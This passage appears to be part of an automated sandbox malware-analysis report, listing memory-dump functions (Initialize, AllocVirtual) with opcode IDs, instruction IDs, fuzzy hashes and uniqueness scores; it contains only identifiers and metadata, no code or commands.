                    • Instruction Fuzzy Hash: 81112B226285029DEF2D67F4BC13A3E1D4AEB80714F24ED2EB183D9096DD38C6019032
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction ID: 6d294ec287cdc932930267f9f89c506be3d2d5d9dcfc4b32974423b9cb20a158
                    • Opcode Fuzzy Hash: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction Fuzzy Hash: E2113872900215CECF05DFA8E9C1A5DBFA9FB5030CF69D225C1479F166CBB48901CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction ID: 687202c59a84bb7391ff02166c94e661900429d602556ad213aff7e88b0aaa15
                    • Opcode Fuzzy Hash: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction Fuzzy Hash: 32116B3CD14213EDEF275B608C02ABD2E69FB92701F3C9199F08355041ED358A42AE75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction ID: b2a45f396671bdcc897dc19090fe21366116466d0c09b5b01f1f90f6ceef47a4
                    • Opcode Fuzzy Hash: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction Fuzzy Hash: 95110472900215CECF45DFA8EAC5A5DBFA9FB5030CF65D225C147AF166CBB49901CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction ID: 64a067ca84d24fba6f08b4bbd4b4c6db10ebb1407554fe64026d488419a603cb
                    • Opcode Fuzzy Hash: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction Fuzzy Hash: 6701763CD00227EDEF2AABA08C06EBD2969FB51701F3C9189E043A5041EE348A056E75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction ID: ce71b41d7f63bd1d5e27d7e3c5147dfe2480fca06facde81286007e39c60320a
                    • Opcode Fuzzy Hash: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction Fuzzy Hash: 3F01493CD00227DDEF2AABA08C06EBD696DFB51701F389089E14365041EE348A416E75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction ID: 0e16551a1439cddb9a16e2b610ac2d1bde36daa54daf6218d3660412a3c5e7ad
                    • Opcode Fuzzy Hash: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction Fuzzy Hash: C9F02B3CC00227DDDF2A9BA0CC06AAC7679FB50701F3891DAE14766090EE318A415F75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction ID: 32988a79880f730b94014a8ce95729f940d3f745dc9f31311a8aae9a236f85af
                    • Opcode Fuzzy Hash: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction Fuzzy Hash: 51F0B43CC002279EDF2A9BA4CC16AAD7A79FB50700F3890DAE14665090EE319A459F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions